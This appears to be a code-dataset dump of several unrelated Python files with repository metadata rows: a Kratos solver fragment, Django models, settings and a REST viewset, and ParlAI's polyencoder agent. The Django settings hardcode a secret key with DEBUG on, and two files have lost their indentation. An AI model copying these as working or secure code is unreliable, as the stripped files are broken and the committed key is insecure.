linear_solver_configuration = self.settings["linear_solver_settings"]
if linear_solver_configuration.Has("solver_type"): # user specified a linear solver
from KratosMultiphysics import python_linear_solver_factory as linear_solver_factory
return linear_solver_factory.ConstructSolver(linear_solver_configuration)
else:
# using a default linear solver (selecting the fastest one available)
import KratosMultiphysics.kratos_utilities as kratos_utils
if kratos_utils.IsApplicationAvailable("EigenSolversApplication"):
from KratosMultiphysics import EigenSolversApplication
elif kratos_utils.IsApplicationAvailable("ExternalSolversApplication"):
from KratosMultiphysics import ExternalSolversApplication
linear_solvers_by_speed = [
"pardiso_lu", # EigenSolversApplication (if compiled with Intel-support)
"sparse_lu", # EigenSolversApplication
"pastix", # ExternalSolversApplication (if Pastix is included in compilation)
"super_lu", # ExternalSolversApplication
"skyline_lu_factorization" # in Core, always available, but slow
]
for solver_name in linear_solvers_by_speed:
if KratosMultiphysics.LinearSolverFactory().Has(solver_name):
linear_solver_configuration.AddEmptyValue("solver_type").SetString(solver_name)
self.print_on_rank_zero('::[MechanicalSolver]:: ',\
'Using "' + solver_name + '" as default linear solver')
return KratosMultiphysics.LinearSolverFactory().Create(linear_solver_configuration)
raise Exception("Linear-Solver could not be constructed!")
def _create_builder_and_solver(self):
linear_solver = self.get_linear_solver()
if self.settings["block_builder"].GetBool():
builder_and_solver = KratosMultiphysics.ResidualBasedBlockBuilderAndSolver(linear_solver)
else:
if self.settings["multi_point_constraints_used"].GetBool():
builder_and_solver = KratosMultiphysics.ResidualBasedEliminationBuilderAndSolverWithConstraints(linear_solver)
else:
builder_and_solver = KratosMultiphysics.ResidualBasedEliminationBuilderAndSolver(linear_solver)
return builder_and_solver
def _create_solution_scheme(self):
"""Create the solution scheme for the structural problem.
"""
raise Exception("Solution Scheme creation must be implemented in the derived class.")
def _create_mechanical_solution_strategy(self):
analysis_type = self.settings["analysis_type"].GetString()
if analysis_type == "linear":
mechanical_solution_strategy = self._create_linear_strategy()
elif analysis_type == "non_linear":
if(self.settings["line_search"].GetBool() == False):
mechanical_solution_strategy = self._create_newton_raphson_strategy()
else:
mechanical_solution_strategy = self._create_line_search_strategy()
else:
err_msg = "The requested analysis type \"" + analysis_type + "\" is not available!\n"
err_msg += "Available options are: \"linear\", \"non_linear\""
raise Exception(err_msg)
return mechanical_solution_strategy
def _create_linear_strategy(self):
computing_model_part = self.GetComputingModelPart()
mechanical_scheme = self.get_solution_scheme()
linear_solver = self.get_linear_solver()
builder_and_solver = self.get_builder_and_solver()
return KratosMultiphysics.ResidualBasedLinearStrategy(computing_model_part,
mechanical_scheme,
linear_solver,
builder_and_solver,
self.settings["compute_reactions"].GetBool(),
self.settings["reform_dofs_at_each_step"].GetBool(),
False,
self.settings["move_mesh_flag"].GetBool())
def _create_newton_raphson_strategy(self):
computing_model_part = self.GetComputingModelPart()
mechanical_scheme = self.get_solution_scheme()
linear_solver = self.get_linear_solver()
mechanical_convergence_criterion = self.get_convergence_criterion()
builder_and_solver = self.get_builder_and_solver()
return KratosMultiphysics.ResidualBasedNewtonRaphsonStrategy(computing_model_part,
mechanical_scheme,
linear_solver,
mechanical_convergence_criterion,
builder_and_solver,
self.settings["max_iteration"].GetInt(),
self.settings["compute_reactions"].GetBool(),
self.settings["reform_dofs_at_each_step"].GetBool(),
self.settings["move_mesh_flag"].GetBool())
def _create_line_search_strategy(self):
computing_model_part = self.GetComputingModelPart()
mechanical_scheme = self.get_solution_scheme()
linear_solver = self.get_linear_solver()
mechanical_convergence_criterion = self.get_convergence_criterion()
builder_and_solver = self.get_builder_and_solver()
return KratosMultiphysics.LineSearchStrategy(computing_model_part,
mechanical_scheme,
linear_solver,
mechanical_convergence_criterion,
builder_and_solver,
self.settings["max_iteration"].GetInt(),
self.settings["compute_reactions"].GetBool(),
self.settings["reform_dofs_at_each_step"].GetBool(),
self.settings["move_mesh_flag"].GetBool())
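# --- Editor's note: hedged sketch, not part of the original solver file. ---
# The `_create_linear_solver` fallback above walks a speed-ordered preference
# list and picks the first solver that the installed Kratos applications
# actually provide. The stand-alone snippet below reproduces only that
# selection pattern in plain Python; the `available` set and the helper name
# are illustrative stand-ins for KratosMultiphysics.LinearSolverFactory().Has().
def _pick_first_available_solver(preferred, available):
    """Return the first preferred solver name that is available."""
    for name in preferred:
        if name in available:
            return name
    raise RuntimeError("No linear solver from the preference list is available")
print(_pick_first_available_solver(
    ["pardiso_lu", "sparse_lu", "pastix", "super_lu", "skyline_lu_factorization"],
    {"skyline_lu_factorization"}))  # -> 'skyline_lu_factorization'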
| 58.413926
| 145
| 0.688477
|
794fe387714e74df97b7b6adb6a5fa190de66e94
| 2,601
|
py
|
Python
|
users/models.py
|
benhoyt/pythondotorg
|
954865291a8e4a4c4a4adb269b505d6dbab0eb5f
|
[
"Apache-2.0"
] | null | null | null |
users/models.py
|
benhoyt/pythondotorg
|
954865291a8e4a4c4a4adb269b505d6dbab0eb5f
|
[
"Apache-2.0"
] | null | null | null |
users/models.py
|
benhoyt/pythondotorg
|
954865291a8e4a4c4a4adb269b505d6dbab0eb5f
|
[
"Apache-2.0"
] | null | null | null |
from django.conf import settings
from django.contrib.auth.models import AbstractUser
from django.core.urlresolvers import reverse
from django.db import models
from django.utils import timezone
from markupfield.fields import MarkupField
from .managers import UserManager
DEFAULT_MARKUP_TYPE = getattr(settings, 'DEFAULT_MARKUP_TYPE', 'markdown')
class User(AbstractUser):
bio = MarkupField(blank=True, default_markup_type=DEFAULT_MARKUP_TYPE)
SEARCH_PRIVATE = 0
SEARCH_PUBLIC = 1
SEARCH_CHOICES = (
(SEARCH_PUBLIC, 'Allow search engines to index my profile page (recommended)'),
(SEARCH_PRIVATE, "Don't allow search engines to index my profile page"),
)
search_visibility = models.IntegerField(choices=SEARCH_CHOICES, default=SEARCH_PUBLIC)
EMAIL_PUBLIC = 0
EMAIL_PRIVATE = 1
EMAIL_NEVER = 2
EMAIL_CHOICES = (
(EMAIL_PUBLIC, 'Anyone can see my e-mail address'),
(EMAIL_PRIVATE, 'Only logged-in users can see my e-mail address'),
(EMAIL_NEVER, 'No one can ever see my e-mail address'),
)
email_privacy = models.IntegerField('E-mail privacy', choices=EMAIL_CHOICES, default=EMAIL_NEVER)
objects = UserManager()
def get_absolute_url(self):
return reverse('users:user_detail', kwargs={'slug': self.username})
class Membership(models.Model):
legal_name = models.CharField(max_length=100)
preferred_name = models.CharField(max_length=100)
email_address = models.EmailField(max_length=100)
city = models.CharField(max_length=100, blank=True)
region = models.CharField('State, Province or Region', max_length=100, blank=True)
country = models.CharField(max_length=100, blank=True)
postal_code = models.CharField(max_length=20, blank=True)
# PSF fields
psf_code_of_conduct = models.NullBooleanField('I agree to the PSF Code of Conduct', blank=True)
psf_announcements = models.NullBooleanField('I would like to receive occasional PSF email announcements', blank=True)
created = models.DateTimeField(default=timezone.now, blank=True)
updated = models.DateTimeField(blank=True)
# FIXME: This should be a OneToOneField
creator = models.ForeignKey(User, null=True, blank=True)
# creator = models.OneToOneField(User, null=True, blank=True)
def __str__(self):
if self.creator:
return "Membership object for user: %s" % self.creator.username
else:
return "Membership '%s'" % self.legal_name
def save(self, **kwargs):
self.updated = timezone.now()
return super().save(**kwargs)
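# --- Editor's note: hedged usage sketch, not part of the original models file. ---
# The integer `choices` fields above store only the numeric value; Django exposes
# the human-readable label through get_<field>_display(), e.g.
# user.get_email_privacy_display(). The self-contained snippet below shows the
# same int-to-label lookup without a configured Django project, reusing the
# EMAIL_CHOICES tuples defined on the User model above.
EXAMPLE_EMAIL_CHOICES = (
    (0, 'Anyone can see my e-mail address'),
    (1, 'Only logged-in users can see my e-mail address'),
    (2, 'No one can ever see my e-mail address'),
)
stored_value = 2  # the model default (EMAIL_NEVER)
print(dict(EXAMPLE_EMAIL_CHOICES)[stored_value])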
| 37.695652
| 121
| 0.720492
|
794fe39613cff7104c15ae5188a98b37eacb4626
| 3,334
|
py
|
Python
|
Calculate-distance/distance_proj/settings.py
|
Aayush-hub/Amazing-Python-Scripts
|
5488454b16fa969d32ad7a56618e62e64291c052
|
[
"MIT"
] | 3
|
2021-01-14T13:54:22.000Z
|
2021-11-15T11:26:51.000Z
|
Calculate-distance/distance_proj/settings.py
|
Aayush-hub/Amazing-Python-Scripts
|
5488454b16fa969d32ad7a56618e62e64291c052
|
[
"MIT"
] | 1
|
2021-02-24T02:06:21.000Z
|
2021-02-24T02:06:21.000Z
|
Calculate-distance/distance_proj/settings.py
|
Aayush-hub/Amazing-Python-Scripts
|
5488454b16fa969d32ad7a56618e62e64291c052
|
[
"MIT"
] | null | null | null |
"""
Django settings for distance_proj project.
Generated by 'django-admin startproject' using Django 3.1.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ns4ev24u@efvcuii*7g1=e)_((y6b2b(%wh(__7d#2y5n3e%t4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'measurements',
'crispy_forms',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'distance_proj.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'distance_proj.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
CRISPY_ALLOWED_TEMPLATE_PACKS = ('bootstrap', 'uni_form', 'bootstrap3', 'foundation-5')
# CRISPY_TEMPLATE_PACK='bootstrap4'
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
GEOIP_PATH = os.path.join(BASE_DIR,'geoip')
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
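# --- Editor's note: hedged sketch, not part of the original settings file. ---
# The "BASE_DIR / 'subdir'" idiom used above works because pathlib.Path
# overloads the "/" operator. A minimal stand-alone illustration (the project
# root below is made up):
from pathlib import Path
example_base_dir = Path('/srv/distance_proj')   # hypothetical project root
print(example_base_dir / 'db.sqlite3')          # how DATABASES['default']['NAME'] is built
print(example_base_dir / 'geoip')               # pathlib equivalent of the GEOIP_PATH join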
| 26.460317
| 91
| 0.70246
|
794fe3a29826c70ad02ae0479da3dd8af9e14fba
| 499
|
py
|
Python
|
alunos/views/matriculas.py
|
scpaes/django-REST-framework-project
|
9f2eaf82d5eb742434a16cd69d84983c5f1966d9
|
[
"MIT"
] | null | null | null |
alunos/views/matriculas.py
|
scpaes/django-REST-framework-project
|
9f2eaf82d5eb742434a16cd69d84983c5f1966d9
|
[
"MIT"
] | null | null | null |
alunos/views/matriculas.py
|
scpaes/django-REST-framework-project
|
9f2eaf82d5eb742434a16cd69d84983c5f1966d9
|
[
"MIT"
] | null | null | null |
from alunos.serializer import MatriculaSerializer
from rest_framework import viewsets
from alunos.models import Matricula
from rest_framework.authentication import BasicAuthentication
from rest_framework.permissions import IsAuthenticated
class MatriculaViewSet(viewsets.ModelViewSet):
    """Enrollment (matricula) endpoint."""
queryset = Matricula.objects.all()
serializer_class = MatriculaSerializer
permission_classes = [IsAuthenticated]
authentication_classes = [BasicAuthentication]
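# --- Editor's note: hedged usage sketch, not part of the original views file. ---
# A ModelViewSet like the one above is normally exposed through a DRF router in
# the project's urls.py. The route prefix 'matriculas' below is an assumption,
# not taken from this repository; the router, path and include calls are
# standard Django REST framework / Django APIs.
# In urls.py (sketch):
#     from django.urls import include, path
#     from rest_framework import routers
#     from alunos.views.matriculas import MatriculaViewSet
#     router = routers.DefaultRouter()
#     router.register('matriculas', MatriculaViewSet)
#     urlpatterns = [path('', include(router.urls))]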
| 31.1875
| 61
| 0.825651
|
794fe461e3c04b260d93b432513a8ecb087f32ce
| 22,269
|
py
|
Python
|
doc/integrations/pytorch/parlai/agents/transformer/polyencoder.py
|
novium258/cortx-1
|
ce5b939b33b8d24d89b31807ac3bcaa8f24096bc
|
[
"Apache-2.0"
] | 1
|
2020-09-27T05:00:06.000Z
|
2020-09-27T05:00:06.000Z
|
doc/integrations/pytorch/parlai/agents/transformer/polyencoder.py
|
novium258/cortx-1
|
ce5b939b33b8d24d89b31807ac3bcaa8f24096bc
|
[
"Apache-2.0"
] | 1
|
2021-08-04T11:17:39.000Z
|
2021-08-04T11:17:39.000Z
|
doc/integrations/pytorch/parlai/agents/transformer/polyencoder.py
|
novium258/cortx-1
|
ce5b939b33b8d24d89b31807ac3bcaa8f24096bc
|
[
"Apache-2.0"
] | 1
|
2021-05-03T13:27:14.000Z
|
2021-05-03T13:27:14.000Z
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# hack to make sure -m transformer/generator works as expected
"""
Poly-encoder Agent.
"""
from parlai.core.params import ParlaiParser
from typing import Any, Dict, Optional, Tuple
import torch
from parlai.core.opt import Opt
from parlai.core.torch_ranker_agent import TorchRankerAgent
from parlai.utils.misc import recursive_getattr
from parlai.utils.logging import logging
from .biencoder import AddLabelFixedCandsTRA
from .modules import BasicAttention, MultiHeadAttention, TransformerEncoder
from .transformer import TransformerRankerAgent
class PolyencoderAgent(TorchRankerAgent):
"""
Poly-encoder Agent.
Equivalent of bert_ranker/polyencoder and biencoder_multiple_output but does not
rely on an external library (hugging face).
"""
@classmethod
def add_cmdline_args(
cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
) -> ParlaiParser:
"""
Add command-line arguments specifically for this agent.
"""
TransformerRankerAgent.add_cmdline_args(parser, partial_opt=partial_opt)
agent = parser.add_argument_group('Polyencoder Arguments')
agent.add_argument(
'--polyencoder-type',
type=str,
default='codes',
choices=['codes', 'n_first'],
            help='Type of polyencoder, either we compute '
            'vectors using codes + attention, or we '
            'simply take the first N vectors.',
recommended='codes',
)
agent.add_argument(
'--poly-n-codes',
type=int,
default=64,
            help='number of vectors used to represent the context; '
            'in the case of n_first, those are the number '
            'of vectors that are considered.',
recommended=64,
)
agent.add_argument(
'--poly-attention-type',
type=str,
default='basic',
choices=['basic', 'sqrt', 'multihead'],
            help='Type of the top aggregation layer of the poly-'
            'encoder (where the candidate representation is '
            'the key)',
recommended='basic',
)
agent.add_argument(
'--poly-attention-num-heads',
type=int,
default=4,
help='In case poly-attention-type is multihead, '
'specify the number of heads',
)
        # These arguments apply when the polyencoder type is 'codes'.
agent.add_argument(
'--codes-attention-type',
type=str,
default='basic',
choices=['basic', 'sqrt', 'multihead'],
            help='Type of attention used to aggregate the context into the code vectors',
recommended='basic',
)
agent.add_argument(
'--codes-attention-num-heads',
type=int,
default=4,
help='In case codes-attention-type is multihead, '
'specify the number of heads',
)
return agent
@classmethod
def upgrade_opt(cls, opt_from_disk: Opt):
# call the parent upgrades
opt_from_disk = super(PolyencoderAgent, cls).upgrade_opt(opt_from_disk)
polyencoder_attention_keys_value = opt_from_disk.get(
'polyencoder_attention_keys'
)
if polyencoder_attention_keys_value is not None:
# 2020-02-19 We are deprecating this flag because it was used for a one-time
# set of experiments and won't be used again. This flag was defaulted to
# 'context', so throw an exception otherwise.
if polyencoder_attention_keys_value == 'context':
del opt_from_disk['polyencoder_attention_keys']
else:
raise NotImplementedError(
'This --polyencoder-attention-keys mode (found in commit 06f0d9f) is no longer supported!'
)
return opt_from_disk
def __init__(self, opt, shared=None):
super().__init__(opt, shared)
self.rank_loss = torch.nn.CrossEntropyLoss(reduce=True, size_average=True)
if self.use_cuda:
self.rank_loss.cuda()
def build_model(self, states=None):
"""
Return built model.
"""
return PolyEncoderModule(self.opt, self.dict, self.NULL_IDX)
def vectorize(self, *args, **kwargs):
"""
Add the start and end token to the labels.
"""
kwargs['add_start'] = True
kwargs['add_end'] = True
obs = super().vectorize(*args, **kwargs)
return obs
def _set_text_vec(self, *args, **kwargs):
"""
Add the start and end token to the text.
"""
obs = super()._set_text_vec(*args, **kwargs)
if 'text_vec' in obs and 'added_start_end_tokens' not in obs:
obs.force_set(
'text_vec', self._add_start_end_tokens(obs['text_vec'], True, True)
)
obs['added_start_end_tokens'] = True
return obs
def vectorize_fixed_candidates(self, *args, **kwargs):
"""
Vectorize fixed candidates.
Override to add start and end token when computing the candidate encodings in
interactive mode.
"""
kwargs['add_start'] = True
kwargs['add_end'] = True
return super().vectorize_fixed_candidates(*args, **kwargs)
def _make_candidate_encs(self, vecs):
"""
Make candidate encs.
The polyencoder module expects cand vecs to be 3D while torch_ranker_agent
expects it to be 2D. This requires a little adjustment (used in interactive mode
only)
"""
rep = super()._make_candidate_encs(vecs)
return rep.transpose(0, 1).contiguous()
def encode_candidates(self, padded_cands):
"""
Encode candidates.
"""
padded_cands = padded_cands.unsqueeze(1)
_, _, cand_rep = self.model(cand_tokens=padded_cands)
return cand_rep
def score_candidates(self, batch, cand_vecs, cand_encs=None):
"""
Score candidates.
The Poly-encoder encodes the candidate and context independently. Then, the
model applies additional attention before ultimately scoring a candidate.
"""
bsz = self._get_batch_size(batch)
ctxt_rep, ctxt_rep_mask, _ = self.model(**self._model_context_input(batch))
if cand_encs is not None:
if bsz == 1:
cand_rep = cand_encs
else:
cand_rep = cand_encs.expand(bsz, cand_encs.size(1), -1)
# bsz x num cands x seq len
elif len(cand_vecs.shape) == 3:
_, _, cand_rep = self.model(cand_tokens=cand_vecs)
# bsz x seq len (if batch cands) or num_cands x seq len (if fixed cands)
elif len(cand_vecs.shape) == 2:
_, _, cand_rep = self.model(cand_tokens=cand_vecs.unsqueeze(1))
num_cands = cand_rep.size(0) # will be bsz if using batch cands
cand_rep = cand_rep.expand(num_cands, bsz, -1).transpose(0, 1).contiguous()
scores = self.model(
ctxt_rep=ctxt_rep, ctxt_rep_mask=ctxt_rep_mask, cand_rep=cand_rep
)
return scores
def _get_batch_size(self, batch) -> int:
"""
Return the size of the batch.
Can be overridden by subclasses that do not always have text input.
"""
return batch.text_vec.size(0)
def _model_context_input(self, batch) -> Dict[str, Any]:
"""
Create the input context value for the model.
Must return a dictionary. This will be passed directly into the model via
`**kwargs`, i.e.,
>>> model(**_model_context_input(batch))
This is intentionally overridable so that richer models can pass additional
inputs.
"""
return {'ctxt_tokens': batch.text_vec}
def load_state_dict(self, state_dict):
"""
Override to account for codes.
"""
if self.model.type == 'codes' and 'codes' not in state_dict:
state_dict['codes'] = self.model.codes
super().load_state_dict(state_dict)
def _resize_token_embeddings(self, state_dict, msg=None):
"""
Resize the token embeddings when adding extra special tokens.
H/t TransformerGenerator._resize_token_embeddings for inspiration.
"""
# map extra special tokens carefully
new_size = self.model.encoder_ctxt.embeddings.weight.size()[0]
orig_size = state_dict['encoder_ctxt.embeddings.weight'].size()[0]
logging.info(f'Resizing token embeddings from {orig_size} to {new_size}')
if new_size <= orig_size:
# new size should be greater than original size,
# as we are adding special tokens
raise RuntimeError(msg)
for emb_weights in [
'encoder_ctxt.embeddings.weight',
'encoder_cand.embeddings.weight',
]:
# get new_embs
old_embs = state_dict[emb_weights]
new_embs = recursive_getattr(self.model, emb_weights).to(old_embs.device)
# copy over old weights
new_embs.data[:orig_size, :] = old_embs.data[:orig_size, :]
# reset in state dict
state_dict[emb_weights] = new_embs
return state_dict
class PolyEncoderModule(torch.nn.Module):
"""
Poly-encoder model.
See https://arxiv.org/abs/1905.01969 for more details
"""
def __init__(self, opt, dict_, null_idx):
super(PolyEncoderModule, self).__init__()
self.null_idx = null_idx
self.encoder_ctxt = self.get_encoder(
opt=opt,
dict_=dict_,
null_idx=null_idx,
reduction_type=None,
for_context=True,
)
self.encoder_cand = self.get_encoder(
opt=opt,
dict_=dict_,
null_idx=null_idx,
reduction_type=opt['reduction_type'],
for_context=False,
)
self.type = opt['polyencoder_type']
self.n_codes = opt['poly_n_codes']
self.attention_type = opt['poly_attention_type']
self.attention_num_heads = opt['poly_attention_num_heads']
self.codes_attention_type = opt['codes_attention_type']
self.codes_attention_num_heads = opt['codes_attention_num_heads']
embed_dim = opt['embedding_size']
# In case it's a polyencoder with code.
if self.type == 'codes':
# experimentally it seems that random with size = 1 was good.
codes = torch.empty(self.n_codes, embed_dim)
codes = torch.nn.init.uniform_(codes)
self.codes = torch.nn.Parameter(codes)
# The attention for the codes.
if self.codes_attention_type == 'multihead':
self.code_attention = MultiHeadAttention(
self.codes_attention_num_heads, embed_dim, opt['dropout']
)
elif self.codes_attention_type == 'sqrt':
self.code_attention = PolyBasicAttention(
self.type, self.n_codes, dim=2, attn='sqrt', get_weights=False
)
elif self.codes_attention_type == 'basic':
self.code_attention = PolyBasicAttention(
self.type, self.n_codes, dim=2, attn='basic', get_weights=False
)
# The final attention (the one that takes the candidate as key)
if self.attention_type == 'multihead':
self.attention = MultiHeadAttention(
self.attention_num_heads, opt['embedding_size'], opt['dropout']
)
else:
self.attention = PolyBasicAttention(
self.type,
self.n_codes,
dim=2,
attn=self.attention_type,
get_weights=False,
)
def get_encoder(self, opt, dict_, null_idx, reduction_type, for_context: bool):
"""
Return encoder, given options.
:param opt:
opt dict
:param dict:
dictionary agent
:param null_idx:
null/pad index into dict
:param reduction_type:
reduction type for the encoder
:param for_context:
whether this is the context encoder (as opposed to the candidate encoder).
Useful for subclasses.
:return:
a TransformerEncoder, initialized correctly
"""
embeddings = self._get_embeddings(
dict_=dict_, null_idx=null_idx, embedding_size=opt['embedding_size']
)
return TransformerEncoder(
opt=opt,
embedding=embeddings,
vocabulary_size=len(dict_),
padding_idx=null_idx,
reduction_type=reduction_type,
)
def _get_embeddings(self, dict_, null_idx, embedding_size):
embeddings = torch.nn.Embedding(
len(dict_), embedding_size, padding_idx=null_idx
)
torch.nn.init.normal_(embeddings.weight, 0, embedding_size ** -0.5)
return embeddings
def attend(self, attention_layer, queries, keys, values, mask):
"""
Apply attention.
:param attention_layer:
nn.Module attention layer to use for the attention
:param queries:
the queries for attention
:param keys:
the keys for attention
:param values:
the values for attention
:param mask:
mask for the attention keys
:return:
the result of applying attention to the values, with weights computed
wrt to the queries and keys.
"""
if keys is None:
keys = values
if isinstance(attention_layer, PolyBasicAttention):
return attention_layer(queries, keys, mask_ys=mask, values=values)
elif isinstance(attention_layer, MultiHeadAttention):
return attention_layer(queries, keys, values, mask)[0]
else:
raise Exception('Unrecognized type of attention')
def encode(
self, cand_tokens: Optional[torch.Tensor], **ctxt_inputs: torch.Tensor
) -> Tuple[Optional[torch.Tensor], Optional[torch.Tensor], Optional[torch.Tensor]]:
"""
Encode a text sequence.
:param ctxt_inputs:
Dictionary of context inputs. If not empty, should contain at least
'ctxt_tokens', a 2D long tensor of shape batchsize x sent_len
:param cand_tokens:
3D long tensor, batchsize x num_cands x sent_len
Note this will actually view it as a 2D tensor
:return:
(ctxt_rep, ctxt_mask, cand_rep)
- ctxt_rep 3D float tensor, batchsize x n_codes x dim
- ctxt_mask byte: batchsize x n_codes (all 1 in case
of polyencoder with code. Which are the vectors to use
in the ctxt_rep)
- cand_rep (3D float tensor) batchsize x num_cands x dim
"""
cand_embed = None
ctxt_rep = None
ctxt_rep_mask = None
if cand_tokens is not None:
assert len(cand_tokens.shape) == 3
bsz = cand_tokens.size(0)
num_cands = cand_tokens.size(1)
cand_embed = self.encoder_cand(cand_tokens.view(bsz * num_cands, -1))
cand_embed = cand_embed.view(bsz, num_cands, -1)
if len(ctxt_inputs) > 0:
assert 'ctxt_tokens' in ctxt_inputs
if ctxt_inputs['ctxt_tokens'] is not None:
assert len(ctxt_inputs['ctxt_tokens'].shape) == 2
bsz = self._get_context_batch_size(**ctxt_inputs)
# get context_representation. Now that depends on the cases.
ctxt_out, ctxt_mask = self.encoder_ctxt(
**self._context_encoder_input(ctxt_inputs)
)
dim = ctxt_out.size(2)
if self.type == 'codes':
ctxt_rep = self.attend(
self.code_attention,
queries=self.codes.repeat(bsz, 1, 1),
keys=ctxt_out,
values=ctxt_out,
mask=ctxt_mask,
)
ctxt_rep_mask = ctxt_rep.new_ones(bsz, self.n_codes).byte()
elif self.type == 'n_first':
# Expand the output if it is not long enough
if ctxt_out.size(1) < self.n_codes:
difference = self.n_codes - ctxt_out.size(1)
extra_rep = ctxt_out.new_zeros(bsz, difference, dim)
ctxt_rep = torch.cat([ctxt_out, extra_rep], dim=1)
extra_mask = ctxt_mask.new_zeros(bsz, difference)
ctxt_rep_mask = torch.cat([ctxt_mask, extra_mask], dim=1)
else:
ctxt_rep = ctxt_out[:, 0 : self.n_codes, :]
ctxt_rep_mask = ctxt_mask[:, 0 : self.n_codes]
return ctxt_rep, ctxt_rep_mask, cand_embed
def _get_context_batch_size(self, **ctxt_inputs: torch.Tensor) -> int:
"""
Return the batch size of the context.
Can be overridden by subclasses that do not always have text tokens in the
context.
"""
return ctxt_inputs['ctxt_tokens'].size(0)
def _context_encoder_input(self, ctxt_inputs: Dict[str, Any]) -> Dict[str, Any]:
"""
Return the inputs to the context encoder as a dictionary.
Must return a dictionary. This will be passed directly into the model via
`**kwargs`, i.e.,
>>> encoder_ctxt(**_context_encoder_input(ctxt_inputs))
This is needed because the context encoder's forward function may have different
argument names than that of the model itself. This is intentionally overridable
so that richer models can pass additional inputs.
"""
assert set(ctxt_inputs.keys()) == {'ctxt_tokens'}
return {'input': ctxt_inputs['ctxt_tokens']}
def score(self, ctxt_rep, ctxt_rep_mask, cand_embed):
"""
Score the candidates.
:param ctxt_rep:
3D float tensor, bsz x ctxt_len x dim
:param ctxt_rep_mask:
2D byte tensor, bsz x ctxt_len, in case there are some elements
of the ctxt that we should not take into account.
:param cand_embed: 3D float tensor, bsz x num_cands x dim
:return: scores, 2D float tensor: bsz x num_cands
"""
# reduces the context representation to a 3D tensor bsz x num_cands x dim
ctxt_final_rep = self.attend(
self.attention, cand_embed, ctxt_rep, ctxt_rep, ctxt_rep_mask
)
scores = torch.sum(ctxt_final_rep * cand_embed, 2)
return scores
def forward(
self,
cand_tokens=None,
ctxt_rep=None,
ctxt_rep_mask=None,
cand_rep=None,
**ctxt_inputs,
):
"""
Forward pass of the model.
Due to a limitation of parlai, we have to have one single model
in the agent. And because we want to be able to use data-parallel,
we need to have one single forward() method.
        Therefore the operation performed is either 'encode' or 'score', depending on which arguments are passed.
:param ctxt_inputs:
Dictionary of context inputs. Will include at least 'ctxt_tokens',
containing tokenized contexts
:param cand_tokens:
tokenized candidates
:param ctxt_rep:
(bsz x num_codes x hsz)
encoded representation of the context. If self.type == 'codes', these
are the context codes. Otherwise, they are the outputs from the
encoder
:param ctxt_rep_mask:
mask for ctxt rep
:param cand_rep:
encoded representation of the candidates
"""
if len(ctxt_inputs) > 0 or cand_tokens is not None:
return self.encode(cand_tokens=cand_tokens, **ctxt_inputs)
elif (
ctxt_rep is not None and ctxt_rep_mask is not None and cand_rep is not None
):
return self.score(ctxt_rep, ctxt_rep_mask, cand_rep)
raise Exception('Unsupported operation')
class PolyBasicAttention(BasicAttention):
"""
Override basic attention to account for edge case for polyencoder.
"""
def __init__(self, poly_type, n_codes, *args, **kwargs):
super().__init__(*args, **kwargs)
self.poly_type = poly_type
self.n_codes = n_codes
def forward(self, *args, **kwargs):
"""
Forward pass.
Account for accidental dimensionality reduction when num_codes is 1 and the
polyencoder type is 'codes'
"""
lhs_emb = super().forward(*args, **kwargs)
if self.poly_type == 'codes' and self.n_codes == 1 and len(lhs_emb.shape) == 2:
lhs_emb = lhs_emb.unsqueeze(self.dim - 1)
return lhs_emb
class IRFriendlyPolyencoderAgent(AddLabelFixedCandsTRA, PolyencoderAgent):
"""
Poly-encoder agent that allows for adding label to fixed cands.
"""
@classmethod
def add_cmdline_args(
cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
) -> ParlaiParser:
"""
Add cmd line args.
"""
AddLabelFixedCandsTRA.add_cmdline_args(parser, partial_opt=partial_opt)
PolyencoderAgent.add_cmdline_args(parser, partial_opt=partial_opt)
return parser
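# --- Editor's note: hedged sketch, not part of the original ParlAI file. ---
# Shape walk-through of PolyEncoderModule.score() for the 'basic' attention
# path, in plain torch and without masking: the context codes
# (bsz x n_codes x dim) are attended over with the candidate encodings as
# queries, and the result is reduced to one score per candidate. This mirrors
# the idea only; it is not the library's exact implementation.
import torch
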